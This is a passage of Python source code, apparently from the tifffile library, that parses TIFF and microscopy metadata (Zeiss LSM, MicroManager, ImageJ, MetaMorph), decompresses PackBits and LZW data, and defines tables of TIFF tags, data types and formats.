fh.read(4))[0] return fh.read_array('<2f8', count=size) def read_cz_lsm_positions(fh): """Read LSM positions from file and return as list.""" size = struct.unpack('<I', fh.read(4))[0] return fh.read_array('<2f8', count=size) def read_cz_lsm_time_stamps(fh): """Read LSM time stamps from file and return as list.""" size, count = struct.unpack('<ii', fh.read(8)) if size != (8 + 8 * count): raise ValueError("lsm_time_stamps block is too short") # return struct.unpack('<%dd' % count, fh.read(8*count)) return fh.read_array('<f8', count=count) def read_cz_lsm_event_list(fh): """Read LSM events from file and return as list of (time, type, text).""" count = struct.unpack('<II', fh.read(8))[1] events = [] while count > 0: esize, etime, etype = struct.unpack('<IdI', fh.read(16)) etext = stripnull(fh.read(esize - 16)) events.append((etime, etype, etext)) count -= 1 return events def read_cz_lsm_scan_info(fh): """Read LSM scan information from file and return as Record.""" block = Record() blocks = [block] unpack = struct.unpack if 0x10000000 != struct.unpack('<I', fh.read(4))[0]: # not a Recording sub block raise ValueError("not a lsm_scan_info structure") fh.read(8) while True: entry, dtype, size = unpack('<III', fh.read(12)) if dtype == 2: # ascii value = stripnull(fh.read(size)) elif dtype == 4: # long value = unpack('<i', fh.read(4))[0] elif dtype == 5: # rational value = unpack('<d', fh.read(8))[0] else: value = 0 if entry in CZ_LSM_SCAN_INFO_ARRAYS: blocks.append(block) name = CZ_LSM_SCAN_INFO_ARRAYS[entry] newobj = [] setattr(block, name, newobj) block = newobj elif entry in CZ_LSM_SCAN_INFO_STRUCTS: blocks.append(block) newobj = Record() block.append(newobj) block = newobj elif entry in CZ_LSM_SCAN_INFO_ATTRIBUTES: name = CZ_LSM_SCAN_INFO_ATTRIBUTES[entry] setattr(block, name, value) elif entry == 0xffffffff: # end sub block block = blocks.pop() else: # unknown entry setattr(block, "entry_0x%x" % entry, value) if not blocks: break return block def read_nih_image_header(fh, byteorder, dtype, count): """Read NIH_IMAGE_HEADER tag from file and return as numpy.rec.array.""" a = fh.read_record(NIH_IMAGE_HEADER, byteorder=byteorder) a = a.newbyteorder(byteorder) a.xunit = a.xunit[:a._xunit_len] a.um = a.um[:a._um_len] return a def read_micromanager_metadata(fh): """Read MicroManager non-TIFF settings from open file and return as dict. The settings can be used to read image data without parsing the TIFF file. Raise ValueError if file does not contain valid MicroManager metadata. """ fh.seek(0) try: byteorder = {b'II': '<', b'MM': '>'}[fh.read(2)] except IndexError: raise ValueError("not a MicroManager TIFF file") results = {} fh.seek(8) (index_header, index_offset, display_header, display_offset, comments_header, comments_offset, summary_header, summary_length ) = struct.unpack(byteorder + "IIIIIIII", fh.read(32)) if summary_header != 2355492: raise ValueError("invalid MicroManager summary_header") results['summary'] = read_json(fh, byteorder, None, summary_length) if index_header != 54773648: raise ValueError("invalid MicroManager index_header") fh.seek(index_offset) header, count = struct.unpack(byteorder + "II", fh.read(8)) if header != 3453623: raise ValueError("invalid MicroManager index_header") data = struct.unpack(byteorder + "IIIII"*count, fh.read(20*count)) results['index_map'] = { 'channel': data[::5], 'slice': data[1::5], 'frame': data[2::5], 'position': data[3::5], 'offset': data[4::5]} if display_header != 483765892: raise ValueError("invalid MicroManager display_header") fh.seek(display_offset) header, count = struct.unpack(byteorder + "II", fh.read(8)) if header != 347834724: raise ValueError("invalid MicroManager display_header") results['display_settings'] = read_json(fh, byteorder, None, count) if comments_header != 99384722: raise ValueError("invalid MicroManager comments_header") fh.seek(comments_offset) header, count = struct.unpack(byteorder + "II", fh.read(8)) if header != 84720485: raise ValueError("invalid MicroManager comments_header") results['comments'] = read_json(fh, byteorder, None, count) return results def imagej_metadata(data, bytecounts, byteorder): """Return dict from ImageJ metadata tag value.""" _str = str if sys.version_info[0] < 3 else lambda x: str(x, 'cp1252') def read_string(data, byteorder): return _str(stripnull(data[0 if byteorder == '<' else 1::2])) def read_double(data, byteorder): return struct.unpack(byteorder+('d' * (len(data) // 8)), data) def read_bytes(data, byteorder): #return struct.unpack('b' * len(data), data) return numpy.fromstring(data, 'uint8') metadata_types = { # big endian b'info': ('info', read_string), b'labl': ('labels', read_string), b'rang': ('ranges', read_double), b'luts': ('luts', read_bytes), b'roi ': ('roi', read_bytes), b'over': ('overlays', read_bytes)} metadata_types.update( # little endian dict((k[::-1], v) for k, v in metadata_types.items())) if not bytecounts: raise ValueError("no ImageJ metadata") if not data[:4] in (b'IJIJ', b'JIJI'): raise ValueError("invalid ImageJ metadata") header_size = bytecounts[0] if header_size < 12 or header_size > 804: raise ValueError("invalid ImageJ metadata header size") ntypes = (header_size - 4) // 8 header = struct.unpack(byteorder+'4sI'*ntypes, data[4:4+ntypes*8]) pos = 4 + ntypes * 8 counter = 0 result = {} for mtype, count in zip(header[::2], header[1::2]): values = [] name, func = metadata_types.get(mtype, (_str(mtype), read_bytes)) for _ in range(count): counter += 1 pos1 = pos + bytecounts[counter] values.append(func(data[pos:pos1], byteorder)) pos = pos1 result[name.strip()] = values[0] if count == 1 else values return result def imagej_description(description): """Return dict from ImageJ image_description tag.""" def _bool(val): return {b'true': True, b'false': False}[val.lower()] _str = str if sys.version_info[0] < 3 else lambda x: str(x, 'cp1252') result = {} for line in description.splitlines(): try: key, val = line.split(b'=') except Exception: continue key = key.strip() val = val.strip() for dtype in (int, float, _bool, _str): try: val = dtype(val) break except Exception: pass result[_str(key)] = val return result def _replace_by(module_function, package=None, warn=False): """Try replace decorated function by module.function.""" try: from importlib import import_module except ImportError: warnings.warn('could not import module importlib') return lambda func: func def decorate(func, module_function=module_function, warn=warn): try: module, function = module_function.split('.') if not package: module = import_module(module) else: module = import_module('.' + module, package=package) func, oldfunc = getattr(module, function), func globals()['__old_' + func.__name__] = oldfunc except Exception: if warn: warnings.warn("failed to import %s" % module_function) return func return decorate def decodejpg(encoded, tables=b'', photometric=None, ycbcr_subsampling=None, ycbcr_positioning=None): """Decode JPEG encoded byte string (using _czifile extension module).""" import _czifile image = _czifile.decodejpg(encoded, tables) if photometric == 'rgb' and ycbcr_subsampling and ycbcr_positioning: # TODO: convert YCbCr to RGB pass return image.tostring() @_replace_by('_tifffile.decodepackbits') def decodepackbits(encoded): """Decompress PackBits encoded byte string. PackBits is a simple byte-oriented run-length compression scheme. """ func = ord if sys.version[0] == '2' else lambda x: x result = [] result_extend = result.extend i = 0 try: while True: n = func(encoded[i]) + 1 i += 1 if n < 129: result_extend(encoded[i:i+n]) i += n elif n > 129: result_extend(encoded[i:i+1] * (258-n)) i += 1 except IndexError: pass return b''.join(result) if sys.version[0] == '2' else bytes(result) @_replace_by('_tifffile.decodelzw') def decodelzw(encoded): """Decompress LZW (Lempel-Ziv-Welch) encoded TIFF strip (byte string). The strip must begin with a CLEAR code and end with an EOI code. This is an implementation of the LZW decoding algorithm described in (1). It is not compatible with old style LZW compressed files like quad-lzw.tif. """ len_encoded = len(encoded) bitcount_max = len_encoded * 8 unpack = struct.unpack if sys.version[0] == '2': newtable = [chr(i) for i in range(256)] else: newtable = [bytes([i]) for i in range(256)] newtable.extend((0, 0)) def next_code(): """Return integer of `bitw` bits at `bitcount` position in encoded.""" start = bitcount // 8 s = encoded[start:start+4] try: code = unpack('>I', s)[0] except Exception: code = unpack('>I', s + b'\x00'*(4-len(s)))[0] code <<= bitcount % 8 code &= mask return code >> shr switchbitch = { # code: bit-width, shr-bits, bit-mask 255: (9, 23, int(9*'1'+'0'*23, 2)), 511: (10, 22, int(10*'1'+'0'*22, 2)), 1023: (11, 21, int(11*'1'+'0'*21, 2)), 2047: (12, 20, int(12*'1'+'0'*20, 2)), } bitw, shr, mask = switchbitch[255] bitcount = 0 if len_encoded < 4: raise ValueError("strip must be at least 4 characters long") if next_code() != 256: raise ValueError("strip must begin with CLEAR code") code = 0 oldcode = 0 result = [] result_append = result.append while True: code = next_code() # ~5% faster when inlining this function bitcount += bitw if code == 257 or bitcount >= bitcount_max: # EOI break if code == 256: # CLEAR table = newtable[:] table_append = table.append lentable = 258 bitw, shr, mask = switchbitch[255] code = next_code() bitcount += bitw if code == 257: # EOI break result_append(table[code]) else: if code < lentable: decoded = table[code] newcode = table[oldcode] + decoded[:1] else: newcode = table[oldcode] newcode += newcode[:1] decoded = newcode result_append(decoded) table_append(newcode) lentable += 1 oldcode = code if lentable in switchbitch: bitw, shr, mask = switchbitch[lentable] if code != 257: warnings.warn("unexpected end of lzw stream (code %i)" % code) return b''.join(result) @_replace_by('_tifffile.unpackints') def unpackints(data, dtype, itemsize, runlen=0): """Decompress byte string to array of integers of any bit size <= 32. Parameters ---------- data : byte str Data to decompress. dtype : numpy.dtype or str A numpy boolean or integer type. itemsize : int Number of bits per integer. runlen : int Number of consecutive integers, after which to start at next byte. """ if itemsize == 1: # bitarray data = numpy.fromstring(data, '|B') data = numpy.unpackbits(data) if runlen % 8: data = data.reshape(-1, runlen + (8 - runlen % 8)) data = data[:, :runlen].reshape(-1) return data.astype(dtype) dtype = numpy.dtype(dtype) if itemsize in (8, 16, 32, 64): return numpy.fromstring(data, dtype) if itemsize < 1 or itemsize > 32: raise ValueError("itemsize out of range: %i" % itemsize) if dtype.kind not in "biu": raise ValueError("invalid dtype") itembytes = next(i for i in (1, 2, 4, 8) if 8 * i >= itemsize) if itembytes != dtype.itemsize: raise ValueError("dtype.itemsize too small") if runlen == 0: runlen = len(data) // itembytes skipbits = runlen*itemsize % 8 if skipbits: skipbits = 8 - skipbits shrbits = itembytes*8 - itemsize bitmask = int(itemsize*'1'+'0'*shrbits, 2) dtypestr = '>' + dtype.char # dtype always big endian? unpack = struct.unpack l = runlen * (len(data)*8 // (runlen*itemsize + skipbits)) result = numpy.empty((l, ), dtype) bitcount = 0 for i in range(len(result)): start = bitcount // 8 s = data[start:start+itembytes] try: code = unpack(dtypestr, s)[0] except Exception: code = unpack(dtypestr, s + b'\x00'*(itembytes-len(s)))[0] code <<= bitcount % 8 code &= bitmask result[i] = code >> shrbits bitcount += itemsize if (i+1) % runlen == 0: bitcount += skipbits return result def unpackrgb(data, dtype='<B', bitspersample=(5, 6, 5), rescale=True): """Return array from byte string containing packed samples. Use to unpack RGB565 or RGB555 to RGB888 format. Parameters ---------- data : byte str The data to be decoded. Samples in each pixel are stored consecutively. Pixels are aligned to 8, 16, or 32 bit boundaries. dtype : numpy.dtype The sample data type. The byteorder applies also to the data stream. bitspersample : tuple Number of bits for each sample in a pixel. rescale : bool Upscale samples to the number of bits in dtype. Returns ------- result : ndarray Flattened array of unpacked samples of native dtype. Examples -------- >>> data = struct.pack('BBBB', 0x21, 0x08, 0xff, 0xff) >>> print(unpackrgb(data, '<B', (5, 6, 5), False)) [ 1 1 1 31 63 31] >>> print(unpackrgb(data, '<B', (5, 6, 5))) [ 8 4 8 255 255 255] >>> print(unpackrgb(data, '<B', (5, 5, 5))) [ 16 8 8 255 255 255] """ dtype = numpy.dtype(dtype) bits = int(numpy.sum(bitspersample)) if not (bits <= 32 and all(i <= dtype.itemsize*8 for i in bitspersample)): raise ValueError("sample size not supported %s" % str(bitspersample)) dt = next(i for i in 'BHI' if numpy.dtype(i).itemsize*8 >= bits) data = numpy.fromstring(data, dtype.byteorder+dt) result = numpy.empty((data.size, len(bitspersample)), dtype.char) for i, bps in enumerate(bitspersample): t = data >> int(numpy.sum(bitspersample[i+1:])) t &= int('0b'+'1'*bps, 2) if rescale: o = ((dtype.itemsize * 8) // bps + 1) * bps if o > data.dtype.itemsize * 8: t = t.astype('I') t *= (2**o - 1) // (2**bps - 1) t //= 2**(o - (dtype.itemsize * 8)) result[:, i] = t return result.reshape(-1) def reorient(image, orientation): """Return reoriented view of image array. Parameters ---------- image : numpy array Non-squeezed output of asarray() functions. Axes -3 and -2 must be image length and width respectively. orientation : int or str One of TIFF_ORIENTATIONS keys or values. """ o = TIFF_ORIENTATIONS.get(orientation, orientation) if o == 'top_left': return image elif o == 'top_right': return image[..., ::-1, :] elif o == 'bottom_left': return image[..., ::-1, :, :] elif o == 'bottom_right': return image[..., ::-1, ::-1, :] elif o == 'left_top': return numpy.swapaxes(image, -3, -2) elif o == 'right_top': return numpy.swapaxes(image, -3, -2)[..., ::-1, :] elif o == 'left_bottom': return numpy.swapaxes(image, -3, -2)[..., ::-1, :, :] elif o == 'right_bottom': return numpy.swapaxes(image, -3, -2)[..., ::-1, ::-1, :] def squeeze_axes(shape, axes, skip='XY'): """Return shape and axes with single-dimensional entries removed. Remove unused dimensions unless their axes are listed in 'skip'. >>> squeeze_axes((5, 1, 2, 1, 1), 'TZYXC') ((5, 2, 1), 'TYX') """ if len(shape) != len(axes): raise ValueError("dimensions of axes and shape don't match") shape, axes = zip(*(i for i in zip(shape, axes) if i[0] > 1 or i[1] in skip)) return shape, ''.join(axes) def transpose_axes(data, axes, asaxes='CTZYX'): """Return data with its axes permuted to match specified axes. A view is returned if possible. >>> transpose_axes(numpy.zeros((2, 3, 4, 5)), 'TYXC', asaxes='CTZYX').shape (5, 2, 1, 3, 4) """ for ax in axes: if ax not in asaxes: raise ValueError("unknown axis %s" % ax) # add missing axes to data shape = data.shape for ax in reversed(asaxes): if ax not in axes: axes = ax + axes shape = (1,) + shape data = data.reshape(shape) # transpose axes data = data.transpose([axes.index(ax) for ax in asaxes]) return data def stack_pages(pages, memmap=False, *args, **kwargs): """Read data from sequence of TiffPage and stack them vertically. If memmap is True, return an array stored in a binary file on disk. Additional parameters are passsed to the page asarray function. """ if len(pages) == 0: raise ValueError("no pages") if len(pages) == 1: return pages[0].asarray(memmap=memmap, *args, **kwargs) result = pages[0].asarray(*args, **kwargs) shape = (len(pages),) + result.shape if memmap: with tempfile.NamedTemporaryFile() as fh: result = numpy.memmap(fh, dtype=result.dtype, shape=shape) else: result = numpy.empty(shape, dtype=result.dtype) for i, page in enumerate(pages): result[i] = page.asarray(*args, **kwargs) return result def stripnull(string): """Return string truncated at first null character. Clean NULL terminated C strings. >>> stripnull(b'string\\x00') b'string' """ i = string.find(b'\x00') return string if (i < 0) else string[:i] def stripascii(string): """Return string truncated at last byte that is 7bit ASCII. Clean NULL separated and terminated TIFF strings. >>> stripascii(b'string\\x00string\\n\\x01\\x00') b'string\\x00string\\n' >>> stripascii(b'\\x00') b'' """ # TODO: pythonize this ord_ = ord if sys.version_info[0] < 3 else lambda x: x i = len(string) while i: i -= 1 if 8 < ord_(string[i]) < 127: break else: i = -1 return string[:i+1] def format_size(size): """Return file size as string from byte size.""" for unit in ('B', 'KB', 'MB', 'GB', 'TB'): if size < 2048: return "%.f %s" % (size, unit) size /= 1024.0 def sequence(value): """Return tuple containing value if value is not a sequence. >>> sequence(1) (1,) >>> sequence([1]) [1] """ try: len(value) return value except TypeError: return (value, ) def product(iterable): """Return product of sequence of numbers. Equivalent of functools.reduce(operator.mul, iterable, 1). >>> product([2**8, 2**30]) 274877906944 >>> product([]) 1 """ prod = 1 for i in iterable: prod *= i return prod def natural_sorted(iterable): """Return human sorted list of strings. E.g. for sorting file names. >>> natural_sorted(['f1', 'f2', 'f10']) ['f1', 'f2', 'f10'] """ def sortkey(x): return [(int(c) if c.isdigit() else c) for c in re.split(numbers, x)] numbers = re.compile(r'(\d+)') return sorted(iterable, key=sortkey) def excel_datetime(timestamp, epoch=datetime.datetime.fromordinal(693594)): """Return datetime object from timestamp in Excel serial format. Convert LSM time stamps. >>> excel_datetime(40237.029999999795) datetime.datetime(2010, 2, 28, 0, 43, 11, 999982) """ return epoch + datetime.timedelta(timestamp) def julian_datetime(julianday, milisecond=0): """Return datetime from days since 1/1/4713 BC and ms since midnight. Convert Julian dates according to MetaMorph. >>> julian_datetime(2451576, 54362783) datetime.datetime(2000, 2, 2, 15, 6, 2, 783) """ if julianday <= 1721423: # no datetime before year 1 return None a = julianday + 1 if a > 2299160: alpha = math.trunc((a - 1867216.25) / 36524.25) a += 1 + alpha - alpha // 4 b = a + (1524 if a > 1721423 else 1158) c = math.trunc((b - 122.1) / 365.25) d = math.trunc(365.25 * c) e = math.trunc((b - d) / 30.6001) day = b - d - math.trunc(30.6001 * e) month = e - (1 if e < 13.5 else 13) year = c - (4716 if month > 2.5 else 4715) hour, milisecond = divmod(milisecond, 1000 * 60 * 60) minute, milisecond = divmod(milisecond, 1000 * 60) second, milisecond = divmod(milisecond, 1000) return datetime.datetime(year, month, day, hour, minute, second, milisecond) def test_tifffile(directory='testimages', verbose=True): """Read all images in directory. Print error message on failure. >>> test_tifffile(verbose=False) """ successful = 0 failed = 0 start = time.time() for f in glob.glob(os.path.join(directory, '*.*')): if verbose: print("\n%s>\n" % f.lower(), end='') t0 = time.time() try: tif = TiffFile(f, multifile=True) except Exception as e: if not verbose: print(f, end=' ') print("ERROR:", e) failed += 1 continue try: img = tif.asarray() except ValueError: try: img = tif[0].asarray() except Exception as e: if not verbose: print(f, end=' ') print("ERROR:", e) failed += 1 continue finally: tif.close() successful += 1 if verbose: print("%s, %s %s, %s, %.0f ms" % ( str(tif), str(img.shape), img.dtype, tif[0].compression, (time.time()-t0) * 1e3)) if verbose: print("\nSuccessfully read %i of %i files in %.3f s\n" % ( successful, successful+failed, time.time()-start)) class TIFF_SUBFILE_TYPES(object): def __getitem__(self, key): result = [] if key & 1: result.append('reduced_image') if key & 2: result.append('page') if key & 4: result.append('mask') return tuple(result) TIFF_PHOTOMETRICS = { 0: 'miniswhite', 1: 'minisblack', 2: 'rgb', 3: 'palette', 4: 'mask', 5: 'separated', # CMYK 6: 'ycbcr', 8: 'cielab', 9: 'icclab', 10: 'itulab', 32803: 'cfa', # Color Filter Array 32844: 'logl', 32845: 'logluv', 34892: 'linear_raw' } TIFF_COMPESSIONS = { 1: None, 2: 'ccittrle', 3: 'ccittfax3', 4: 'ccittfax4', 5: 'lzw', 6: 'ojpeg', 7: 'jpeg', 8: 'adobe_deflate', 9: 't85', 10: 't43', 32766: 'next', 32771: 'ccittrlew', 32773: 'packbits', 32809: 'thunderscan', 32895: 'it8ctpad', 32896: 'it8lw', 32897: 'it8mp', 32898: 'it8bl', 32908: 'pixarfilm', 32909: 'pixarlog', 32946: 'deflate', 32947: 'dcs', 34661: 'jbig', 34676: 'sgilog', 34677: 'sgilog24', 34712: 'jp2000', 34713: 'nef', } TIFF_DECOMPESSORS = { None: lambda x: x, 'adobe_deflate': zlib.decompress, 'deflate': zlib.decompress, 'packbits': decodepackbits, 'lzw': decodelzw, # 'jpeg': decodejpg } TIFF_DATA_TYPES = { 1: '1B', # BYTE 8-bit unsigned integer. 2: '1s', # ASCII 8-bit byte that contains a 7-bit ASCII code; # the last byte must be NULL (binary zero). 3: '1H', # SHORT 16-bit (2-byte) unsigned integer 4: '1I', # LONG 32-bit (4-byte) unsigned integer. 5: '2I', # RATIONAL Two LONGs: the first represents the numerator of # a fraction; the second, the denominator. 6: '1b', # SBYTE An 8-bit signed (twos-complement) integer. 7: '1s', # UNDEFINED An 8-bit byte that may contain anything, # depending on the definition of the field. 8: '1h', # SSHORT A 16-bit (2-byte) signed (twos-complement) integer. 9: '1i', # SLONG A 32-bit (4-byte) signed (twos-complement) integer. 10: '2i', # SRATIONAL Two SLONGs: the first represents the numerator # of a fraction, the second the denominator. 11: '1f', # FLOAT Single precision (4-byte) IEEE format. 12: '1d', # DOUBLE Double precision (8-byte) IEEE format. 13: '1I', # IFD unsigned 4 byte IFD offset. #14: '', # UNICODE #15: '', # COMPLEX 16: '1Q', # LONG8 unsigned 8 byte integer (BigTiff) 17: '1q', # SLONG8 signed 8 byte integer (BigTiff) 18: '1Q', # IFD8 unsigned 8 byte IFD offset (BigTiff) } TIFF_SAMPLE_FORMATS = { 1: 'uint', 2: 'int', 3: 'float', #4: 'void', #5: 'complex_int', 6: 'complex', } TIFF_SAMPLE_DTYPES = { ('uint', 1): '?', # bitmap ('uint', 2): 'B', ('uint', 3): 'B', ('uint', 4): 'B', ('uint', 5): 'B', ('uint', 6): 'B', ('uint', 7): 'B', ('uint', 8): 'B', ('uint', 9): 'H', ('uint', 10): 'H', ('uint', 11): 'H', ('uint', 12): 'H', ('uint', 13): 'H', ('uint', 14): 'H', ('uint', 15): 'H', ('uint', 16): 'H', ('uint', 17): 'I', ('uint', 18): 'I', ('uint', 19): 'I', ('uint', 20): 'I', ('uint', 21): 'I', ('uint', 22): 'I', ('uint', 23): 'I', ('uint', 24): 'I', ('uint', 25): 'I', ('uint', 26): 'I', ('uint', 27): 'I', ('uint', 28): 'I', ('uint', 29): 'I', ('uint', 30): 'I', ('uint', 31): 'I', ('uint', 32): 'I', ('uint', 64): 'Q', ('int', 8): 'b', ('int', 16): 'h', ('int', 32): 'i', ('int', 64): 'q', ('float', 16): 'e', ('float', 32): 'f', ('float', 64): 'd', ('complex', 64): 'F', ('complex', 128): 'D', ('uint', (5, 6, 5)): 'B', } TIFF_ORIENTATIONS = { 1: 'top_left', 2: 'top_right', 3: 'bottom_right', 4: 'bottom_left', 5: 'left_top', 6: 'right_top', 7: 'right_bottom', 8: 'left_bottom', } # TODO: is there a standard for character axes labels? AXES_LABELS = { 'X': 'width', 'Y': 'height', 'Z': 'depth', 'S': 'sample', # rgb(a) 'I': 'series', # general sequence, plane, page, IFD 'T': 'time', 'C': 'channel', # color, emission wavelength 'A': 'angle', 'P': 'phase', # formerly F # P is Position in LSM! 'R': 'tile', # region, point, mosaic 'H': 'lifetime', # histogram 'E': 'lambda', # excitation wavelength 'L': 'exposure', # lux 'V': 'event', 'Q': 'other', #'M': 'mosaic', # LSM 6 } AXES_LABELS.update(dict((v, k) for k, v in AXES_LABELS.items())) # Map OME pixel types to numpy dtype OME_PIXEL_TYPES = { 'int8': 'i1', 'int16': 'i2', 'int32': 'i4', 'uint8': 'u1', 'uint16': 'u2', 'uint32': 'u4', 'float': 'f4', # 'bit': 'bit', 'double': 'f8', 'complex': 'c8', 'double-complex': 'c16', } # NIH Image PicHeader v1.63 NIH_IMAGE_HEADER = [ ('fileid', 'a8'), ('nlines', 'i2'), ('pixelsperline', 'i2'), ('version', 'i2'), ('oldlutmode', 'i2'), ('oldncolors', 'i2'), ('colors', 'u1', (3, 32)), ('oldcolorstart', 'i2'), ('colorwidth', 'i2'), ('extracolors', 'u2', (6, 3)), ('nextracolors', 'i2'), ('foregroundindex', 'i2'), ('backgroundindex', 'i2'), ('xscale', 'f8'), ('_x0', 'i2'), ('_x1', 'i2'), ('units_t', 'i2'), # NIH_UNITS_TYPE ('p1', [('x', 'i2'), ('y', 'i2')]), ('p2', [('x', 'i2'), ('y', 'i2')]), ('curvefit_t', 'i2'), # NIH_CURVEFIT_TYPE ('ncoefficients', 'i2'), ('coeff', 'f8', 6), ('_um_len', 'u1'), ('um', 'a15'), ('_x2', 'u1'), ('binarypic', 'b1'), ('slicestart', 'i2'), ('sliceend', 'i2'), ('scalemagnification', 'f4'), ('nslices', 'i2'), ('slicespacing', 'f4'), ('currentslice', 'i2'), ('frameinterval', 'f4'), ('pixelaspectratio', 'f4'), ('colorstart', 'i2'), ('colorend', 'i2'), ('ncolors', 'i2'), ('fill1', '3u2'), ('fill2', '3u2'), ('colortable_t', 'u1'), # NIH_COLORTABLE_TYPE ('lutmode_t', 'u1'), # NIH_LUTMODE_TYPE ('invertedtable', 'b1'), ('zeroclip', 'b1'), ('_xunit_len', 'u1'), ('xunit', 'a11'), ('stacktype_t', 'i2'), # NIH_STACKTYPE_TYPE ] NIH_COLORTABLE_TYPE = ( 'CustomTable', 'AppleDefault', 'Pseudo20', 'Pseudo32', 'Rainbow', 'Fire1', 'Fire2', 'Ice', 'Grays', 'Spectrum') NIH_LUTMODE_TYPE = ( 'PseudoColor', 'OldAppleDefault', 'OldSpectrum', 'GrayScale', 'ColorLut', 'CustomGrayscale') NIH_CURVEFIT_TYPE = ( 'StraightLine', 'Poly2', 'Poly3', 'Poly4', 'Poly5', 'ExpoFit', 'PowerFit', 'LogFit', 'RodbardFit', 'SpareFit1', 'Uncalibrated', 'UncalibratedOD') NIH_UNITS_TYPE = ( 'Nanometers', 'Micrometers', 'Millimeters', 'Centimeters', 'Meters', 'Kilometers', 'Inches', 'Feet', 'Miles', 'Pixels', 'OtherUnits') NIH_STACKTYPE_TYPE = ( 'VolumeStack', 'RGBStack', 'MovieStack', 'HSVStack') # Map Universal Imaging Corporation MetaMorph internal tag ids to name and type UIC_TAGS = { 0: ('auto_scale', int), 1: ('min_scale', int), 2: ('max_scale', int), 3: ('spatial_calibration', int), 4: ('x_calibration', Fraction), 5: ('y_calibration', Fraction), 6: ('calibration_units', str), 7: ('name', str), 8: ('thresh_state', int), 9: ('thresh_state_red', int), 10: ('tagid_10', None), # undefined 11: ('thresh_state_green', int), 12: ('thresh_state_blue', int), 13: ('thresh_state_lo', int), 14: ('thresh_state_hi', int), 15: ('zoom', int), 16: ('create_time', julian_datetime), 17: ('last_saved_time', julian_datetime), 18: ('current_buffer', int), 19: ('gray_fit', None), 20: ('gray_point_count', None), 21: ('gray_x', Fraction), 22: ('gray_y', Fraction), 23: ('gray_min', Fraction), 24: ('gray_max', Fraction), 25: ('gray_unit_name', str), 26: ('standard_lut', int), 27: ('wavelength', int), 28: ('stage_position', '(%i,2,2)u4'), # N xy positions as fractions 29: ('camera_chip_offset', '(%i,2,2)u4'), # N xy offsets as fractions 30: ('overlay_mask', None), 31: ('overlay_compress', None), 32: ('overlay', None), 33: ('special_overlay_mask', None), 34: ('special_overlay_compress', None), 35: ('special_overlay', None), 36: ('image_property', read_uic_image_property), 37: ('stage_label', '%ip'), # N str 38: ('autoscale_lo_info', Fraction), 39: ('autoscale_hi_info', Fraction), 40: ('absolute_z', '(%i,2)u4'), # N fractions 41: ('absolute_z_valid', '(%i,)u4'), # N long 42: ('gamma', int), 43: ('gamma_red', int), 44: ('gamma_green', int), 45: ('gamma_blue', int), 46: ('camera_bin', int), 47: ('new_lut', int), 48: ('image_property_ex', None), 49: ('plane_property', int), 50: ('user_lut_table', '(256,3)u1'), 51: ('red_autoscale_info', int), 52: ('red_autoscale_lo_info', Fraction), 53: ('red_autoscale_hi_info', Fraction), 54: ('red_minscale_info', int), 55: ('red_maxscale_info', int), 56: ('green_autoscale_info', int), 57: ('green_autoscale_lo_info', Fraction), 58: ('green_autoscale_hi_info', Fraction), 59: ('green_minscale_info', int), 60: ('green_maxscale_info', int), 61: ('blue_autoscale_info', int), 62: ('blue_autoscale_lo_info', Fraction), 63: ('blue_autoscale_hi_info', Fraction), 64: ('blue_min_scale_info', int), 65: ('blue_max_scale_info', int), #66: ('overlay_plane_color', read_uic_overlay_plane_color), } # Olympus FluoView MM_DIMENSION = [ ('name', 'a16'), ('size', 'i4'), ('origin', 'f8'), ('resolution', 'f8'), ('unit', 'a64'), ] MM_HEADER = [ ('header_flag', 'i2'), ('image_type', 'u1'), ('image_name', 'a257'), ('offset_data', 'u4'), ('palette_size', 'i4'), ('offset_palette0', 'u4'), ('offset_palette1', 'u4'), ('comment_size', 'i4'), ('offset_comment', 'u4'), ('dimensions', MM_DIMENSION, 10), ('offset_position', 'u4'), ('map_type', 'i2'), ('map_min', 'f8'), ('map_max', 'f8'), ('min_value', 'f8'), ('max_value', 'f8'), ('offset_map', 'u4'), ('gamma', 'f8'), ('offset', 'f8'), ('gray_channel', MM_DIMENSION), ('offset_thumbnail', 'u4'), ('voice_field', 'i4'), ('offset_voice_field', 'u4'), ] # Carl Zeiss LSM CZ_LSM_INFO = [ ('magic_number', 'u4'), ('structure_size', 'i4'), ('dimension_x', 'i4'), ('dimension_y', 'i4'), ('dimension_z', 'i4'), ('dimension_channels', 'i4'), ('dimension_time', 'i4'), ('data_type', 'i4'), # CZ_DATA_TYPES ('thumbnail_x', 'i4'), ('thumbnail_y', 'i4'), ('voxel_size_x', 'f8'), ('voxel_size_y', 'f8'), ('voxel_size_z', 'f8'), ('origin_x', 'f8'), ('origin_y', 'f8'), ('origin_z', 'f8'), ('scan_type', 'u2'), ('spectral_scan', 'u2'), ('type_of_data', 'u4'), # CZ_TYPE_OF_DATA ('offset_vector_overlay', 'u4'), ('offset_input_lut', 'u4'), ('offset_output_lut', 'u4'), ('offset_channel_colors', 'u4'), ('time_interval', 'f8'), ('offset_channel_data_types', 'u4'), ('offset_scan_info', 'u4'), # CZ_LSM_SCAN_INFO ('offset_ks_data', 'u4'), ('offset_time_stamps', 'u4'), ('offset_event_list', 'u4'), ('offset_roi', 'u4'), ('offset_bleach_roi', 'u4'), ('offset_next_recording', 'u4'), # LSM 2.0 ends here ('display_aspect_x', 'f8'), ('display_aspect_y', 'f8'), ('display_aspect_z', 'f8'), ('display_aspect_time', 'f8'), ('offset_mean_of_roi_overlay', 'u4'), ('offset_topo_isoline_overlay', 'u4'), ('offset_topo_profile_overlay', 'u4'), ('offset_linescan_overlay', 'u4'), ('offset_toolbar_flags', 'u4'), ('offset_channel_wavelength', 'u4'), ('offset_channel_factors', 'u4'), ('objective_sphere_correction', 'f8'), ('offset_unmix_parameters', 'u4'), # LSM 3.2, 4.0 end here ('offset_acquisition_parameters', 'u4'), ('offset_characteristics', 'u4'), ('offset_palette', 'u4'), ('time_difference_x', 'f8'), ('time_difference_y', 'f8'), ('time_difference_z', 'f8'), ('internal_use_1', 'u4'), ('dimension_p', 'i4'), ('dimension_m', 'i4'), ('dimensions_reserved', '16i4'), ('offset_tile_positions', 'u4'), ('reserved_1', '9u4'), ('offset_positions', 'u4'), ('reserved_2', '21u4'), # must be 0 ] # Import functions for LSM_INFO sub-records CZ_LSM_INFO_READERS = { 'scan_info': read_cz_lsm_scan_info, 'time_stamps': read_cz_lsm_time_stamps, 'event_list': read_cz_lsm_event_list, 'channel_colors': read_cz_lsm_floatpairs, 'positions': read_cz_lsm_floatpairs, 'tile_positions': read_cz_lsm_floatpairs, } # Map cz_lsm_info.scan_type to dimension order CZ_SCAN_TYPES = { 0: 'XYZCT', # x-y-z scan 1: 'XYZCT', # z scan (x-z plane) 2: 'XYZCT', # line scan 3: 'XYTCZ', # time series 